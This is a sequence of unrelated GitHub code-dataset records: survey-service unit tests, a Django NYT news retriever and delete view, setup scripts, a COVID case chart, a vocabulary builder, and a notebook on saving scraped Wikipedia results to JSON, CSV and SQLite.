open(\"tests/test_files/test_survey1.csv\", 'r').read()\n dict = ss.create_survey_from_csv(file)\n\n choice1 = dict[\"choices\"][0]\n choice2 = dict[\"choices\"][1]\n\n self.assertEqual(choice1[\"name\"], \"Päiväkoti Toivo\")\n self.assertEqual(int(choice1[\"spaces\"]), 3)\n self.assertEqual(choice1[\"Postinumero\"], \"00790\")\n self.assertEqual(choice1[\"Lisätietoja\"], \"Tässä tekstiä, pilkulla\")\n\n self.assertEqual(choice2[\"name\"], \"Päiväkoti Gehenna\")\n self.assertEqual(int(choice2[\"spaces\"]), 6)\n self.assertEqual(choice2[\"Postinumero\"], \"00666\")\n self.assertEqual(choice2[\"Lisätietoja\"], \"Tässä tekstiä,, kahdella pilkulla\")\n\n \n def test_survey_creation_case_normal(self):\n '''\n Tests that dict is parsed correctly to survey, its choices and their additional infos\n CASE NORMAL, the dict is valid etc.\n '''\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], self.json_object[\"surveyGroupname\"], self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n # check surveys tables information\n survey_name = ss.get_survey_name(survey_id)\n survey_desc = ss.get_survey_description(survey_id)\n self.assertEqual(survey_name, \"Testikysely JSON\")\n self.assertEqual(survey_desc, \"Tällä testataan kyselyn manuaalista luomista\")\n\n # check choice mandatory informations\n choices = scs.get_list_of_survey_choices(survey_id)\n self.assertEqual(choices[0][2], \"Esimerkkipäiväkoti 1\")\n self.assertEqual(choices[0][3], 8)\n self.assertEqual(choices[1][2], \"Esimerkkipäiväkoti 2\")\n self.assertEqual(choices[1][3], 6)\n\n # check choice additional infos\n choice1_infos = scs.get_choice_additional_infos(choices[0][0])\n choice2_infos = scs.get_choice_additional_infos(choices[1][0])\n self.assertEqual(choice1_infos[0][0], \"Osoite\")\n self.assertEqual(choice1_infos[0][1], \"Keijukaistenpolku 14\")\n self.assertEqual(choice1_infos[1][0], \"Postinumero\")\n self.assertEqual(choice1_infos[1][1], \"00820\")\n\n self.assertEqual(choice2_infos[0][0], \"Osoite\")\n self.assertEqual(choice2_infos[0][1], \"Hattulantie 2\")\n self.assertEqual(choice2_infos[1][0], \"Postinumero\")\n self.assertEqual(choice2_infos[1][1], \"00550\")\n\n def test_count_surveys_created(self):\n '''\n Test survey service function count_surveys_created()\n UPDATE WHEN SURVEYS OF SAME NAME NO LONGER ACCEPTED\n '''\n count = ss.count_surveys_created(self.user_id)\n self.assertEqual(count, 0)\n\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 1\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n count = ss.count_surveys_created(self.user_id)\n self.assertEqual(count, 1)\n\n def test_survey_closed(self):\n '''\n Test survey service functions close_survey() and check_if_survey_closed() normal cases\n '''\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 2\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n closed = ss.check_if_survey_closed(survey_id)\n self.assertEqual(closed, False)\n\n ss.close_survey(survey_id, self.user_id)\n closed = ss.check_if_survey_closed(survey_id)\n self.assertEqual(closed, True)\n\n def test_close_non_existing_survey(self):\n '''\n Test survey service functions close_survey() and check_if_survey_closed() non existing cases\n doesn't differentiate between non-existing and closed, might be a problem\n '''\n ret = ss.close_survey(\"ITSNOTREAL\", self.user_id)\n self.assertEqual(ret, False)\n\n ret = ss.check_if_survey_closed(\"ITSNOTREAL\")\n self.assertEqual(ret, False)\n\n def test_wrong_teacher_cant_close_survey(self):\n '''\n Test that wrong user id can't close an survey\n '''\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 3\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n ret = ss.close_survey(survey_id, self.user_id2)\n\n self.assertEqual(ret, False)\n\n def test_get_list_closed_surveys(self):\n '''\n Test only closed surveys are acquired\n '''\n closed_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 4\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(closed_id, self.user_email)\n open_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 5\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(open_id, self.user_email)\n\n ss.close_survey(closed_id, self.user_id)\n\n surveys = ss.get_list_closed_surveys(self.user_id)\n\n self.assertEqual(surveys[0][0], closed_id)\n self.assertEqual(len(surveys), 1)\n\n def test_get_list_open_surveys(self):\n '''\n Test only open surveys are acquired\n '''\n\n # first check 0 surveys branch\n surveys = ss.get_active_surveys(self.user_id)\n self.assertEqual(surveys, False)\n closed_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 6\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(closed_id, self.user_email)\n open_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 7\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(open_id, self.user_email)\n\n ss.close_survey(closed_id, self.user_id)\n\n surveys = ss.get_active_surveys(self.user_id)\n\n self.assertEqual(surveys[0][0], open_id)\n self.assertEqual(len(surveys), 1)\n\n def test_open_survey_normal(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 8\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n ss.close_survey(survey_id, self.user_id)\n closed = ss.check_if_survey_closed(survey_id)\n self.assertEqual(closed, True)\n\n ss.open_survey(survey_id, self.user_id)\n closed = ss.check_if_survey_closed(survey_id)\n self.assertEqual(closed, False)\n\n def test_open_survey_non_existant(self):\n ret = ss.open_survey(\"ITSNOTREAL\", self.user_id)\n self.assertEqual(ret, False)\n\n def test_open_survey_wrong_teacher(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 9\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n ss.close_survey(survey_id, self.user_id)\n ret = ss.open_survey(survey_id, self.user_id2)\n self.assertEqual(ret, False)\n\n ret = ss.check_if_survey_closed(survey_id)\n self.assertEqual(ret, True)\n\n def test_check_if_survey_results_saved(self):\n '''\n Test functions update_survey_answered() and check_if_survey_results_saved()\n '''\n\n # first check non existant case\n ret = ss.check_if_survey_results_saved(\"ITSNOTREAL\")\n self.assertEqual(ret, False)\n ret = ss.update_survey_answered(\"ITSNOTREAL\")\n self.assertEqual(ret, False)\n\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 10\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n answered = ss.check_if_survey_results_saved(survey_id)\n self.assertEqual(answered, False)\n\n ss.update_survey_answered(survey_id)\n\n answered = ss.check_if_survey_results_saved(survey_id)\n self.assertEqual(answered, True)\n\n def test_get_survey_as_dict(self):\n '''\n Tests that survey service parser dict correctly\n '''\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 11\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n survey_dict = ss.get_survey_as_dict(survey_id)\n\n # table surveys data\n self.assertEqual(survey_dict[\"id\"], survey_id)\n self.assertEqual(survey_dict[\"surveyname\"], \"Test survey 11\")\n self.assertEqual(survey_dict[\"min_choices\"], 2)\n self.assertEqual(survey_dict[\"closed\"], False)\n self.assertEqual(survey_dict[\"results_saved\"], False)\n self.assertEqual(survey_dict[\"survey_description\"], self.json_object[\"surveyInformation\"])\n self.assertEqual(survey_dict[\"time_begin\"], datetime.datetime(2023, 1, 1, 1, 1))\n self.assertEqual(survey_dict[\"time_end\"], datetime.datetime(2024, 1, 1, 2, 2))\n\n # table survey choices data\n self.assertEqual(survey_dict[\"choices\"][0][\"name\"], \"Esimerkkipäiväkoti 1\")\n self.assertEqual(survey_dict[\"choices\"][0][\"seats\"], 8)\n self.assertEqual(survey_dict[\"choices\"][0][\"Osoite\"], \"Keijukaistenpolku 14\")\n self.assertEqual(survey_dict[\"choices\"][0][\"Postinumero\"], \"00820\")\n\n self.assertEqual(survey_dict[\"choices\"][1][\"name\"], \"Esimerkkipäiväkoti 2\")\n self.assertEqual(survey_dict[\"choices\"][1][\"seats\"], 6)\n self.assertEqual(survey_dict[\"choices\"][1][\"Osoite\"], \"Hattulantie 2\")\n self.assertEqual(survey_dict[\"choices\"][1][\"Postinumero\"], \"00550\")\n\n def test_get_list_active_answered_invalid(self):\n active_list = ss.get_list_active_answered(\"ITSNOTREAL\")\n self.assertEqual(active_list, [])\n\n def test_get_list_closed_answered_invalid(self):\n closed_list = ss.get_list_closed_answered(\"ITSNOTREAL\")\n self.assertEqual(closed_list, [])\n\n def test_get_list_active_answered(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 12\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n ranking = \"2,3,5,4,1,6\"\n urr.add_user_ranking(self.user_id3, survey_id, ranking, \"\", \"\")\n active_list = ss.get_list_active_answered(self.user_id3)\n self.assertEqual(1, len(active_list))\n\n def test_get_list_closed_answered(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 12\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n ranking = \"2,3,5,4,1,6\"\n urr.add_user_ranking(self.user_id3, survey_id, ranking, \"\", \"\")\n ss.close_survey(survey_id, self.user_id)\n closed_list = ss.get_list_closed_answered(self.user_id3)\n self.assertEqual(1, len(closed_list))\n\n def test_check_surveys_to_close_empty(self):\n \"\"\"\n Test that the function works when no open surveys\n \"\"\"\n clear_database()\n self.setup_users()\n surveys = ss.check_for_surveys_to_close()\n self.assertEqual(False, surveys)\n\n def test_check_surveys_to_close(self):\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 13\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n survey_id2 = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 14\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.1998\", \"01:01\", \"01.01.1999\", \"02:02\")\n sts.add_teacher_to_survey(survey_id2, self.user_email)\n surveys = ss.check_for_surveys_to_close()\n closed = ss.check_if_survey_closed(survey_id2)\n self.assertEqual(True, closed)\n\n def test_save_survey_edit(self):\n \"\"\"\n Test that editing a survey works\n \"\"\"\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 15\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n ss.save_survey_edit(survey_id, self.edit_dict, self.user_id)\n name = ss.get_survey_name(survey_id)\n self.assertEqual(name, \"Safest (most dangerous lmao) PED's\")\n desc = ss.get_survey_description(survey_id)\n self.assertEqual(desc, \"No way in hell will these have long term affects on your body, mind and soul.\")\n\n def test_survey_deleted(self):\n \"\"\"\"\n Test that after setting surveys as deleted it won't show up on list of active surveys\n \"\"\"\n with open(\"tests/test_files/test_survey1.json\", 'r') as openfile:\n # open as JSON instead of TextIOWrapper or something\n json_object = json.load(openfile)\n\n survey_id1 = ss.create_new_survey_manual(json_object[\"choices\"], \"Test survey 1\", self.user_id, json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n survey_id2 = ss.create_new_survey_manual(json_object[\"choices\"], \"Test survey 2\", self.user_id, json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n\n surveys = ss.get_all_active_surveys()\n self.assertEqual(2, len(surveys))\n\n ss.set_survey_deleted_true(survey_id1)\n surveys = ss.get_all_active_surveys()\n self.assertEqual(1, len(surveys))\n \n def test_len_active_surveys(self):\n \"\"\"\n Test that the length of all active surveys is correct\n \"\"\"\n surveys = ss.get_all_active_surveys()\n length = ss.len_all_surveys()\n self.assertEqual(0, length)\n self.assertFalse(surveys)\n\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 16\", self.user_id, self.json_object[\"surveyInformation\"], 2, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n surveys = ss.get_all_active_surveys()\n length = ss.len_all_surveys()\n self.assertEqual(len(surveys), length)\n","repo_name":"piryopt/pienryhmien-optimointi","sub_path":"tests/survey_service_test.py","file_name":"survey_service_test.py","file_ext":"py","file_size_in_byte":17619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35033690026","text":"from django_project.settings import NYT_API_SECRET\nfrom django.utils import timezone, dateparse\nfrom urllib import request, parse\nfrom partisan.models import nyt_retriever_metadata, search_term, news\nfrom datetime import timedelta\nimport json\n\nclass nyt_retriever():\n\n nyt_endpoint = 'https://api.nytimes.com/svc/search/v2/articlesearch.json'\n next_page_meta = nyt_retriever_metadata()\n api_throttle_meta = nyt_retriever_metadata()\n\n def __init__(self):\n try:\n self.next_page_meta = nyt_retriever_metadata.objects.get(id=\"next_page_meta\")\n except nyt_retriever_metadata.DoesNotExist:\n new_pager_meta = nyt_retriever_metadata(id='next_page_meta', val='0')\n new_pager_meta.save()\n self.next_page_meta = new_pager_meta\n try:\n self.api_throttle_meta = nyt_retriever_metadata.objects.get(id='api_throttle_meta')\n except nyt_retriever_metadata.DoesNotExist:\n dt = timezone.now()\n dt = dt + timedelta(0, -6)\n new_throttle_meta = nyt_retriever_metadata(id='api_throttle_meta', val=dt.strftime('%Y-%m-%d %H:%M:%S%z'))\n new_throttle_meta.save()\n self.api_throttle_meta = new_throttle_meta\n\n def initiatePull(self, term: str, count: int):\n throttle = dateparse.parse_datetime(self.api_throttle_meta.val)\n if timezone.now() > throttle:\n new_dt = timezone.now()\n new_dt = new_dt + timedelta(0, 6)\n self.api_throttle_meta.val = new_dt.strftime('%Y-%m-%d %H:%M:%S%z')\n self.api_throttle_meta.save()\n return self.saveNews(term, count)\n\n def saveNews(self, term: str, count: int):\n pulled_count = 0\n yesterday = timezone.now() - timedelta(1)\n if count > 10:\n count = 10\n term = self.__createTerm(term=term)\n query = self.nyt_endpoint + '?q=' + parse.quote(term.term) \\\n + '&page=' + self.next_page_meta.val \\\n + '&api-key=' + NYT_API_SECRET \\\n + '&sort=newest&facet=true&facet_fields=source&begin_date=' + yesterday.strftime('%Y%m%d') \\\n + '&fl=lead_paragraph,headline,web_url'\n resp = request.urlopen(url=query)\n resp = json.loads(resp.read().decode('utf-8'))\n if resp['status'] == 'OK':\n for news_article in resp['response']['docs']:\n if len(news.objects.filter(source=news_article['web_url'])) == 0:\n new_article = news(\n source=news_article['web_url'],\n text=news_article['headline']['main'] + '. ' + news_article['lead_paragraph'],\n term_id=term.id,\n created_at=timezone.now().strftime('%Y-%m-%d %H:%M:%S%z')\n )\n new_article.save()\n pulled_count = pulled_count + 1\n self.__updatePager(resp)\n else:\n raise SystemError('A 200 was not retuned by the NYT API. The response status is: ' + resp['status'])\n return pulled_count\n\n\n def __createTerm(self, term: str):\n term = search_term.getSearchTerm(term_name=term)\n if term:\n return term\n else:\n term = search_term(term_name=term)\n term.save()\n return term\n\n def __updatePager(self, resp: dict):\n if len(resp['response']['docs']) < 10:\n self.next_page_meta.val = '0'\n self.next_page_meta.save()\n else:\n self.next_page_meta.val = str(int(self.next_page_meta.val) + 1)\n self.next_page_meta.save()\n\n","repo_name":"aporretta4/the-partisan-project","sub_path":"partisan/p_classes/retrievers/nyt.py","file_name":"nyt.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41264052762","text":"from django.shortcuts import redirect\nfrom django.http import Http404\nfrom login.models import Task, CheckBox\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth.models import User\n\ndef deleteCheckBox(pTask):\n allUsers = pTask.course.user.all()\n \n for i in allUsers:\n checkbox = CheckBox.objects.get(user=i, task=pTask)\n checkbox.delete()\n del(allUsers)\n\n@login_required\n@permission_required(\"login.add_task\")\ndef deleteTask(request, id):\n task = Task.objects.get(id=id)\n course = task.course\n if course not in User.objects.get(username=request.user.username).courses.all():\n raise Http404(\"Beim Löschen dieser Aufgabe ist etwas schiefgelaufen\")\n# a = open(\"/home/erv/calendarHW/delete/delete.txt\", \"a\")\n# a.write(\" \".join((request.user.username, str(datetime.now()), str(task.finishDate), task.taskType, task.taskDescription, str(task.course), \"\\n\")))\n# a.close()\n deleteCheckBox(task)\n task.delete()\n del(task)\n return redirect(\"/homework\")\n","repo_name":"asdasdqwer/calendarHW","sub_path":"delete/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24259182863","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nreadme = open(os.path.join(here, 'README.md')).read()\nchanges = open(os.path.join(here, 'CHANGES.md')).read()\n\nrequires = [\n 'pyramid',\n 'psycopg2',\n 'SQLAlchemy',\n 'transaction',\n 'pyramid_tm',\n 'pyramid_debugtoolbar',\n 'pyramid_beaker',\n 'pyramid_scss',\n 'pyramid_jinja2',\n 'zope.sqlalchemy',\n 'waitress',\n 'python-dateutil',\n 'sqlalchemy-batteries>=0.4.4',\n 'docopt',\n]\n\nsetup(\n name='scramble',\n version='0.0',\n description='scramble',\n long_description=\"{readme}\\n\\n{changes}\".format(readme=readme, changes=changes),\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Pyramid\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Internet :: WWW/HTTP :: WSGI :: Application\",\n ],\n author='',\n author_email='',\n url='',\n keywords='web wsgi bfg pylons pyramid',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n test_suite='scramble',\n install_requires = requires,\n entry_points = {\n 'paste.app_factory': [\n 'main = scramble:main',\n ],\n 'console_scripts': [\n 'populate_scramble = scramble.scripts.populate:main',\n ]\n },\n)\n","repo_name":"jessedhillon/scramble","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34924968303","text":"import sys\n\npk_card = int(sys.stdin.readline())\npk_door = int(sys.stdin.readline())\n\nval = 1\ndef trans(num):\n global val\n val = val * num % 20201227\n return val\n\nfor i in range(12):\n bla = trans(17807724)\n print(i, bla)\n\nval = 1\ni = 1\nwhile True:\n if trans(7) == pk_card:\n ls_card = i\n break\n i += 1\nprint('loop size card', ls_card)\n\nval = 1\nfor i in range(ls_card):\n bla = trans(pk_door)\nprint(bla)\n","repo_name":"xilefsensei/adventofcode","sub_path":"20/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8055168927","text":"fib1 = [1, 1, 2, 3, 5, 8, 13]\n\n# get element\nfib1[1] # 1\n\n# slice\nfib1[0:4] # [1,1,2,3]\n\n# concatnation\nfib2 = [21, 34, 55]\nfib1 + fib2 # [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\n\n# change element\nfib1[0] = 9\n\n# append\nfib1.append(21)\n\n# pop\nfib1.pop()\n\n# remove\nfib1.remove(8) # only remove one element\n\n# delete, remove with index\ndel(fib1[0])\n\n# mix data types\nchars = ['mario', 'luigi', 'bowser']\nchars.append(5)\n\n# list in list\nnums = [chars, fib1, [1, 2, 3, 4]]\n","repo_name":"MudOnTire/python3-learning","sub_path":"3. lists.py","file_name":"3. lists.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13001957815","text":"from setuptools import setup\ndescription = \"A Lattice QCD library including statistical, fitting, \" \\\n \"plotting functions and a runner module to help organise \" \\\n \"projects.\"\nsetup(\n name='pyon',\n version='0.0.5',\n packages=['pyon', 'pyon.lib', 'pyon.test', 'pyon.runner',\n 'pyon.lib.io'\n ],\n url='',\n license='',\n author='Shane Drury',\n author_email='shane.r.drury@gmail.com',\n description=description,\n install_requires=['numpy', 'scipy', 'simplejson', 'Jinja2', 'django',\n 'dill', 'matplotlib'],\n classifiers=[\n 'Environment :: Console',\n 'Intended Audience :: Science/Research',\n 'Development Status :: 2 - Pre-Alpha',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3.3',\n 'Topic :: Scientific/Engineering :: Physics',\n 'Topic :: Scientific/Engineering :: Mathematics',\n ],\n entry_points={\n 'console_scripts': ['pyon-admin = '\n 'pyon.core.management:execute_from_command_line'],\n }\n)\n","repo_name":"ShaneDrury/pyon","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29300296656","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\nDAY = 86400\nINTERVAL = 2\n\nfig, ax = plt.subplots()\nfig.autofmt_xdate()\nfig.canvas.manager.set_window_title('Shanghai Infected Persons Line Chart')\n\ndf = pd.read_csv('./data.csv') # data frame\n\ndate = np.array(list(map(lambda x: x.replace(\"月\", \".\").replace(\"日\", \"\"), df.loc[:, \"日期\"].values[::-1])))\ninflection_Persons = df.loc[:, \"感染者\"].values[::-1]\nasymptomatic_Persons = df.loc[:, \"无症状感染者\"].values[::-1]\ndate_index = np.arange(0, len(date))\n\ndef get_perdict_date(start_date=1647187200, length=14):\n return [time.strftime(\"%-m月%-d日\", time.localtime(start_date + DAY * i)) for i in range(length)]\n\nplt.figure(figsize=(len(inflection_Persons) * 0.6, 6), dpi=400)\n\nplt.title(\"Shanghai Infected Persons Line Chart\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"Infected Persons\")\nplt.scatter(date, inflection_Persons)\nplt.scatter(date, asymptomatic_Persons)\nplt.plot(date, inflection_Persons, label=\"Infected Persons\")\nplt.plot(date, asymptomatic_Persons, label=\"Asymptomatic Infected Persons\")\n\n# polyfit to get the linear regression. y = ax + b\n# But this data fits better with the exponential regression\n# use y = ae^(bx) to fit the data => Equivalent y = e^(ax + b) => lny = ax + b\n# Then the result shows y = e^b * e^(ax)\n[a, b] = np.polyfit(date_index, np.log(asymptomatic_Persons), 1) \nplt.plot(date, np.exp(a * date_index + b), label=f\"y = {np.exp(b):.1f} * e ^ ({a:.1f} * x)\")\n\nplt.legend()\nplt.savefig('preview.png')","repo_name":"SteveYuOWO/covid-19-shanghai-inflection-chart","sub_path":"exportpng.py","file_name":"exportpng.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"17499683613","text":"import data\nimport config\nfrom util import iterate, BreakIteration\nfrom base import nbprint\n\nfrom vocab.common import get_vocab_builder\nfrom vocab.vocab_util import check_requirements\n\ndef check_tokens(info):\n # Check if Tokens exist\n if not check_requirements(info):\n nbprint('Skipping Vocab (requirements not satisfied)')\n raise BreakIteration()\n \ndef build_vocab(info):\n # Check if vocab exists\n if config.skip_existing and data.vocab_exists(info):\n nbprint('Skipping Vocab (file exists)')\n return\n \n # Build vocab\n current_vocab_builder = get_vocab_builder(info)\n current_vocab_builder.build_vocab()\n vocab = current_vocab_builder.get_vocab()\n \n # Save Vocab\n data.save_vocab(vocab, info)\n\ndef run_vocab(info = None):\n nbprint('Vocab').push()\n \n if info is None:\n iterate([\"data\", \"token\", \"vocab\"], [check_tokens, build_vocab])\n else:\n check_tokens(info)\n build_vocab(info)\n \n nbprint.pop()","repo_name":"unlikelymaths/tomef","sub_path":"tomef/vocab/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43518934507","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Persistence and Efficency\n# You now might be aware of some of the problems with parsing several pages and how that can quicly get out of hand. While parsing, you might chose to persist the collected data, so that it can be analyzed and cleaned later. \n# Parsing, retrieving, saving, and cleaning data are all separate actions, and you shouldn't try to work with data while collecting. In this notebook you'll practice further parsing techniques along with persistency, both for JSON and CSV formats as well as using SQL and a database.\n# \n# Start by loading one of the available HTML files into the `scrapy` library\n\n# In[1]:\n\n\n# If you haven't already created an activated a virtual environment for this notebook, run this cell\nget_ipython().system('python3 -m venv venv')\nget_ipython().system('source venv/bin/activate')\nget_ipython().system('pip install -r requirements.txt')\n\n\n# In[4]:\n\n\nimport scrapy\nimport os\ncurrent_dir = os.path.abspath('')\nurl = os.path.join(current_dir, \"html/1992_World_Junior_Championships_in_Athletics_–_Men's_high_jump\")\nwith open(url) as _f:\n url_data = _f.read()\n\nresponse = scrapy.http.TextResponse(url, body=url_data, encoding='utf-8')\n\n\n# In[5]:\n\n\n# Make sure that the interesting data is available \ntable = response.xpath('//table')[1].xpath('tbody')\nfor tr in table.xpath('tr'):\n print(tr.xpath('td/b/text()').extract()[0],\n tr.xpath('td/a/text()').extract()[0]\n )\n\n\n# This interaction with `scrapy` in a Jupyter Notebook is useful because you don't need to run the special shell and you also don't need to run the whole spider. Once you learn what you need to do here, you can adapat the spider to persist data.\n# First, start by persisting data as JSON. To do this, you will need to keep the information in a Python data structure like a dictionary, and then load it as a JSON object, and finally, save it to a file.\n\n# In[6]:\n\n\nscrapped_data = {}\nfor tr in table.xpath('tr'):\n medal = tr.xpath('td/b/text()').extract()[0]\n athlete = tr.xpath('td/a/text()').extract()[0]\n scrapped_data[medal] = athlete\n\nscrapped_data\n\n\n# In[7]:\n\n\nimport json\n\n# You can convert Python into JSON first, but there is no need if you use `json.dump()`\n# as shown next\njson_data = json.dumps(scrapped_data)\n\n# Persist it in a file:\nwith open(\"1992_results.json\", \"w\") as _f:\n # use dump() with the Python dictionary directly. \n # the conversion is done on the fly\n json.dump(scrapped_data, _f)\n\n\n# Now that you can persist the scrapped data as JSON, you can also use CSV. This is specially useful if you want to to some data science operations. Although you can use an advanced library like Pandas for this, you can use the standard library CSV module from Python.\n\n# In[8]:\n\n\n# construct the data first\n\ncolumn_names = [\"Medal\", \"Athlete\"]\nrows = []\n\nfor tr in table.xpath('tr'):\n medal = tr.xpath('td/b/text()').extract()[0]\n athlete = tr.xpath('td/a/text()').extract()[0]\n rows.append([medal, athlete])\n\n\n# In[9]:\n\n\n# Now persist it to disk\nimport csv\n\nwith open(\"1992_results.csv\", \"w\") as _f:\n writer = csv.writer(_f)\n\n # write the column names\n writer.writerow(column_names)\n\n # now write the rows\n writer.writerows(rows)\n\n\n# Finally, you can persist data to a database. Unlike the JSON and CSV approach, using a database is much more memory efficient. This is the principal reason why you want to use a database instead of a file on disk. Imagine capturing 10GB of data. This could potentially mean that you need 10GB of available memory to hold onto that data before saving it to disk.\n# By using a database, you can save the data as the data is gathered. \n# \n# For the next cells, use a SQLite database to persist the data. Create the file-based database and the table needed.\n\n# In[10]:\n\n\nimport sqlite3\nconnection = sqlite3.connect(\"1992_results.db\")\ndb_table = 'CREATE TABLE results (id integer primary key, medal TEXT, athlete TEXT)'\ncursor = connection.cursor()\ncursor.execute(db_table)\nconnection.commit()\n\n\n# In[11]:\n\n\n# Now it is time to persist the data. Open the connection again\nconnection = sqlite3.connect(\"1992_results.db\")\ncursor = connection.cursor()\nquery = 'INSERT INTO results(medal, athlete) VALUES(?, ?)'\n\nfor tr in table.xpath('tr'):\n medal = tr.xpath('td/b/text()').extract()[0]\n athlete = tr.xpath('td/a/text()').extract()[0]\n cursor.execute(query, (medal, athlete)) \n connection.commit()\n\n\n# The data is now persisted in a file-based database that you can query. Verify that all works by creating a new connection and querying the database.\n# \n# Update the _wikipedia_ project and spider to use some of these techniques to persist data. Next, try parsing all the files in the _html_ directory instead of just one and persist all results. Do you think you can parse other information as well? \n# \n# Try parsing the height and the results from all the other athletes, not just the top three places.\n","repo_name":"numinousmuses/duke-scripting-sql","sub_path":"persistence lab.py","file_name":"persistence lab.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} 